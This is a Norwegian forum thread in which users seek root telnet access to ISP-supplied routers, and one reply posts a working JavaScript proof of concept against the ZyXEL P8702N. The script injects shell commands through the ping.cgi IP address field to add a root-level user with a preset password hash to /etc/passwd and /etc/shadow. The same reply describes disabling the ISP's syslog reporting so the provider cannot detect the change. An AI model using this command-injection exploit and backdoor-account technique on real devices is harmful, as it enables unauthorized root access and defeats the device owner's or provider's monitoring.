Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  8 12238
Hei, har kjøpt brukt ice.net modem: R90 som er et Axesstel MV610 om jeg husker rett...

Er det noen som har vært bort i det før og vet root passord på den fra ice.net?
har sendt forespørsel å bedt om root passordet til telnet men er ikke så sikker på at jeg får det.

Og så har jeg den nye routeren fra telenor (ZyXEL P8702N) som jeg gjerne kunne tenkt meg å fått tak i telnet root passordet...

Om det er noen som enten vet passord til en av de så hadde det gjort alt så mye lettere, evt om det er noen som har en enkel "Hack" løsning til å få tak i det eller laget en bruker på den, en måte som va like lett som den måten som funket bra på Zyxel P-2812HNU-F3 til å få telenorremoteadmin passordet på...
Når slike situasjoner oppstår:

1. Prøv admin/admin eller admin/1.

2. Google "password <insert modemname>.

Lykke til.
Trådstarter
29 0
jeg vet passordene til å logge inn på web config, men vill ha telnet tilgang til routerene for å åpne for telenorremoteadmin og flere ting...
hvis du vet hvilken config du hyar på ZyXEL så kan du roote den med orginal firmware som du finner på ZyXEL.com og da slipper du telenor firmwaren og har eget root pw og bruker

mer usikker på ice.net

ellers så er det enten google eller kontakte levrandør \ selger for denne informasjonen
Trådstarter
29 0
Sitat av knutazz Vis innlegg
hvis du vet hvilken config du hyar på ZyXEL så kan du roote den med orginal firmware som du finner på ZyXEL.com og da slipper du telenor firmwaren og har eget root pw og bruker

mer usikker på ice.net

ellers så er det enten google eller kontakte levrandør \ selger for denne informasjonen
Vis hele sitatet...
Har du prøvd det på den nye Zyxel routeren ?

På den gamle P2812 så gikk det ikke fordi telenor hadde satt noe inn som gjorde det at firmware måtte blir signert av dem eller noe slikt...

Finner ikke på zyxel sine sider noe om P8702N routeren :/
nei har ikke hatt noen telenor modem på 3år nå men det gikk fint på p2812 med litt tukkling
▼ ... over en uke senere ... ▼
▼ ... mange måneder senere ... ▼
Fant ut av dette for lenge siden, men nå hadde lynet slått ned i routern og jeg måtte gjøre det på nytt med den nye routeren i dag (P8702N).


Gjør det som er forklart her:
-----
Here's a POC javascript:
Using Chrome, open web UI(10.0.0.138/192.168.0.1) and log in as normal user. In Chrome go to View -> Developer -> Open JavaScript console.

Copy and paste the following:

lol_cmds=[";echo '#!/bin/sh' >/tmp/b ;",
";echo -n echo lol >>/tmp/b ;",
";echo -n :x:0:0:OM >>/tmp/b ;",
";echo -n G,,,:/roo >>/tmp/b ;",
";echo -n t:/bin/s >>/tmp/b ;",
";echo -n 'h >>' >>/tmp/b ;",
";echo /etc/passwd >>/tmp/b ;",
";echo -n \"echo '\" >>/tmp/b ;",
";echo -n lol >>/tmp/b ;",
";echo -n ':$1$tKy' >>/tmp/b ;",
";echo -n 'phRcV$V' >>/tmp/b ;",
";echo -n wSPjoXUh8 >>/tmp/b ;",
";echo -n UEb60IOuV >>/tmp/b ;",
";echo -n OS0:13013 >>/tmp/b ;",
";echo -n :0:99999: >>/tmp/b ;",
";echo -n \"7:::' \" >>/tmp/b ;",
";echo -n '>>' >>/tmp/b ;",
";echo -n /etc/shad >>/tmp/b ;",
";echo ow >>/tmp/b ;",
";chmod +x /tmp/b ;",
"; /tmp/b ;"]
lol_i = 0;
function lol() {
if (lol_i < lol_cmds.length) {
$.post("../../../ping.cgi", {ping:1,IPaddress:lol_cmds[lol_i++]});
window.setTimeout(lol, 1500);
} else {
alert('All done!');
}
}
alert('Hit Enter and wait for "All done!" alert\r\nUser: lol, password: omg');
lol();


And press Enter.
You can now telnet/ssh(WinSCP/PuTTY) login with user lol and password omg.
----
Til slutt når du har logget deg inn via WinSCP eller PuTTY, så skifter du passordet på "TelenorRemoteAdmin" og FORTER DEG MED Å LOGGE INNPÅ ROUTERN!!!
Så slår du av sysloggen til Telenor og skifter deretter passordet til TelenorRemoteAdmin igjen...

Grunnen til at passordet må skiftes igjen, er fordi at med en gang du skifter. Blir en syslog sendt til en av Telenor sine IP-adresser, som da registrerer at passordet er skiftet og sender da beskjed tilbake til routern om å ta en hard-reset -_-'
Hei,

når jeg utføre scripten får jeg følgende feilmelding:

Uncaught ReferenceError: $ is not defined

Jeg har ikke peiling med Javascript, men tror at feilmeldingen referer til linje:

$.post("../../../ping.cgi", {ping:1,IPaddress:lol_cmds[lol_i++]});

Må jeg da legge inn min IP-adresse...?

Hilsen

wikinger3